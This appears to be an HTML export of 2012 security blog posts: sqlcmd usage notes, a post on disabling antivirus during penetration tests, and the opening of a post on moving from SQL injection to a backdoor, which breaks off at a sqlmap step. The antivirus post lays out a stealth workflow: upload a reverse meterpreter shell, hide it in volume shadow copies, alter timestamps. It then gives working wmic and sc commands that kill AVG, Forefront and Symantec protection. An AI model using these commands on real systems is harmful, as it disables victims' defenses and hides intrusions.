<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -L</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Connect to MSSQL Server which listen on non default port (10000):</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -S SERVERNAME,10000</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Writing results to outfile file:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -S SERVERNAME -o C:\outfile.txt -e</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Connect to MSSQL Server using username and password:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -S SERVERNAME -U <USERNAME> -P <PASSWORD></pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Executing scripts:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -i dump.sql</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Execute SQL queries and save results to outfile:</div>
<div class="my_syntax_box" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Select All</span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">C:\tools\sqlcmd -S SERVERNAME\INSTANCE -Q "<SQL QUERY>" -o C:\outfile.txt</pre>
</div>
</div>
</div>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
Command line utilities per MSSQL version:</div>
<ul style="background-color: transparent; border: 0px; list-style-image: initial; list-style-position: initial; margin: 0px 40px; outline: 0px; padding: 0px 0px 24px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">SQL Server 2000 – OSQL.exe</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">SQL Server 2005 – OSQL.exe, SQLCMD.exe</li>
<li style="background-color: transparent; border: 0px; list-style: inside; margin: 0px; outline: 0px; padding: 1px 0px; vertical-align: baseline;">SQL Server 2008 – OSQL.exe, SQLCMD.exe</li>
</ul>
<div style="background-color: transparent; border: 0px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
References:<br style="margin: 0px; padding: 0px;" />OSQL: <a href="http://msdn.microsoft.com/en-us/library/aa214012(v=sql.80).aspx" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://msdn.microsoft.com/en-us/library/aa214012(v=sql.80).aspx</a><br style="margin: 0px; padding: 0px;" />SQLcmd: <a href="http://msdn.microsoft.com/en-us/library/ms162773.aspx" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">http://msdn.microsoft.com/en-us/library/ms162773.aspx</a></div>
</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-43334520179024272482012-07-16T14:23:00.002+06:002012-07-16T14:23:52.672+06:00Disabling AntiVirus during Pen Testing<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match assembly stub routines that are used to inject malware into a system. The A/V guys will also pick up on common service executable files such as being used with Metasploit’s bypassuac. Let’s face it, we still need to write stuff into temp directories from time to time.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Mark Baggett, and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (<a href="http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows" style="background-color: transparent; border: none; color: #ff5a00; margin: 0px; outline: invert none 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows</a>). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, then we would likely want to follow this sequence of tasks during a test:</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
a) Disable the A/V product of choice.<br style="margin: 0px; padding: 0px;" />b) Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar)<br style="margin: 0px; padding: 0px;" />c) Upload Mark and Tim’s excellent vssown.vbs script<br style="margin: 0px; padding: 0px;" />a. Enable service and create volume shadow copy.<br style="margin: 0px; padding: 0px;" />b. Disable volume shadow copy service.<br style="margin: 0px; padding: 0px;" />d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy.<br style="margin: 0px; padding: 0px;" />e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’.</div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. Otherwise said, Windows security center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<span id="more-2411" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"></span><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1. Grisoft’s AVG</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
DISABLING:<br style="margin: 0px; padding: 0px;" />a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> cd %systemroot%\program files\avg\avg2012</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> move avgcsrva.exe avgcsrva_.exe</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> move avgemca.exe avgemca_.exe</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> move avgnsa.exe avgnsa_.exe</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> move avgrsa.exe avgrsa_.exe</strong></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> wmic process where “name like ‘avg[cenr]%.exe’” delete</strong></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
c. The watchdog service will to restart all of the binaries but fail.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2. Microsoft Forefront</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
DISABLING: kill the GUI tool and stop the A/V engine service.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> wmic process where name=”msseces.exe” delete</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> sc stop msmpsvc</strong></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
ENABLING: start the A/V service engine, and start the GUI process.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> cd \Program Files\Microsoft Security Client</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> sc start msmpsvc</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> msseces.exe</strong></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">3. Symantec Endpoint Protection</strong></div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe.</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> wmic process where “name like ‘%smc%.exe’” delete</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> sc stop smcservice</strong><br style="margin: 0px; padding: 0px;" /><strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> sc stop “Symantec AntiVirus”</strong></div>
</blockquote>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
ENABLING: restarting just the smcservice will start everything else back up again.</div>
<blockquote style="background-color: #181818; background-image: url(http://www.coresec.org/wp-content/themes/pyrmont-v2/images/blockquote.gif); background-repeat: no-repeat no-repeat; border-bottom-color: rgb(42, 46, 47); border-bottom-style: solid; border-top-color: rgb(42, 46, 47); border-top-style: solid; border-width: 1px 0px; color: #999999; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 15px 24px; outline: 0px; padding: 35px 20px 10px 50px; quotes: none; text-align: -webkit-auto; vertical-align: baseline;">
<div style="background-color: transparent; border: 0px; margin-bottom: 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">C:\> sc start smcservice</strong></div>
</blockquote>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-89035762934242690002012-07-16T14:22:00.002+06:002012-07-16T14:22:46.044+06:00From SQL Injection to Backdoor Installation<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Imagine that our site is vulnerable to SQL Injection in the following link:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
<div class="code" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px !important; border-right-width: 0px !important; border-top-width: 0px !important; margin: 0px; outline: 0px; padding: 2px 4px !important; vertical-align: top;">
<pre class="text" style="background-image: none !important; border: 0px; clear: none !important; float: none !important; font-size: 12px !important; line-height: 1.333 !important; outline: 0px; overflow: visible !important; padding: 0px !important; vertical-align: baseline; width: auto !important;">http://www.foo.org/index.php?option=com_aardvertiser&cat_name=user&task=view</pre>
</div>
</div>
</div>
<div style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;">
Initially we will try to inject it by using sqlmap:</div>
<div class="my_syntax_box" style="background-color: #131313; border: 0px; color: #cccccc; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px; outline: 0px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline; width: 625px !important;">
<span class="my_syntax_selecall" style="background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.coresec.org/2011/09/02/from-sql-injection-to-backdoor-installation/" style="background-color: transparent; background-image: url(http://www.coresec.org/wp-content/plugins/my-syntax/css/images/clipboard.png) !important; background-position: 100% 50%; background-repeat: no-repeat no-repeat !important; border: none; color: #ff5a00; float: right !important; font-family: arial !important; font-size: 12px !important; font-weight: bold !important; line-height: 20px !important; margin: 3px 5px 0px 10px !important; outline: invert none 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 20px !important; padding-top: 0px; text-decoration: none; vertical-align: baseline;">Select All</a></span><span class="my_syntax_Bar" style="background-color: rgb(34, 34, 34) !important; border: 0px; color: rgb(255, 255, 255) !important; display: block !important; font-family: 'Myriad Pro', Arial, Helvetica, sans-serif !important; font-weight: bold !important; line-height: 20px !important; margin: 0px; outline: 0px; padding: 3px 0px 3px 10px !important; vertical-align: baseline; width: 617px !important;">Code:</span><div class="my_syntax" style="background-color: rgb(249, 249, 249) !important; border: 1px solid silver !important; color: rgb(17, 0, 0) !important; margin: 0px 0px 1.5em !important; outline: 0px; overflow: auto !important; padding: 0px; vertical-align: baseline; width: 625px !important;">
